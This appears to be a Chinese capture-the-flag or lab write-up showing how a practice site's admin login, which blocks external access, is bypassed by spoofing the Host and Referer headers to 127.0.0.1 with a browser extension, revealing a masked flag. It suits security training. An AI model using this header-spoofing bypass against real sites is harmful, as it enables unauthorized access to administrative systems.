1. 接第二章,拿到后台地址后,发现后台登录进去后什么都没有
根据网站提示,还有一个admin123 的后台
http://120.203.13.75:8001/admin123
登陆后被警告对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
代码中做了如下控制:对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。
所以需要伪造源IP,达到欺骗程序的目的伪造源IP,
从两个部分入手
Host: 120.203.13.75:8001
Referer:http://120.203.13.75:8001/admin123/Login.asp
Modheader中添加
Host:127.0.0.1
Referer:http://127.0.0.1/admin123/login.asp
登陆:http://120.203.13.75:8001/admin123/Login.asp
得到如下结果GOOD JOB! you flag is zkz{*****}
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.